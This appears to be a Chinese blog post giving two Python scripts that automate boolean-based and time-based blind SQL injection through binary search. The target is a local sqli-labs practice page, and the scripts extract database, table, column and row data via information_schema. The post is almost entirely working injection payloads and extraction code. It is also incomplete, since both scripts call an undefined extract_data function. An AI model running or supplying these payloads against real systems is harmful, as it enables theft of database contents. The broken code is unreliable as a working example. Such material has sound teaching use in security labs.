利用二分法+布尔盲注、时间盲注进行sql注入

一、布尔盲注:

python 复制代码
import requests
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)
 
        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
    print(f"数据库名: {database_name}")
    print(f"表名: {table_names}")
    print(f"列名: {column_names}")
    print(f"数据: {extracted_values}")

二、时间盲注:

python 复制代码
import requests
import time
 
def binary_search_character(url, query, index, low=32, high=127):
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        
        if response_time > 1.5:  # 服务器延迟意味着条件成立
            low = mid
        else:
            high = mid - 1
 
    return chr(low) if low > 32 else ''
 
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
 
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
 
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
 
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
相关推荐
xieliyu.2 小时前
MySQL 六大基础约束详解:NOT NULL/DEFAULT/UNIQUE/ 主键 / 外键 / CHECK
android·数据库·sql·mysql
Anokata3 小时前
MYSQL SQL 执行系列1
android·sql·mysql
迷枫7123 小时前
简单sql与dm功能实验记录
数据库·sql·oracle
zhanghaofaowhrql4 小时前
Spring Data JPA Repository 详解:从基础到高级用法
java·数据库·sql
灯澜忆梦19 小时前
【MySQL2】| DML数据操作语言
数据库·sql
麦聪聊数据1 天前
业务自助取数(下):安全可控前提下,实现取数效率百倍提升
数据库·sql
ShiXZ2131 天前
指令集-SQL 常用指令速查手册
数据库·sql·mysql·oracle
Databend1 天前
小 Bitmap,大优化:Databend 如何加速大规模集合聚合
大数据·数据库·sql
婉然从物1 天前
Flink SQL 元数据持久化实战:从“每次重启表消失”到“Hive Metastore 永久存储”
hive·sql·flink
kali-Myon2 天前
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
数据库·sql·安全·web安全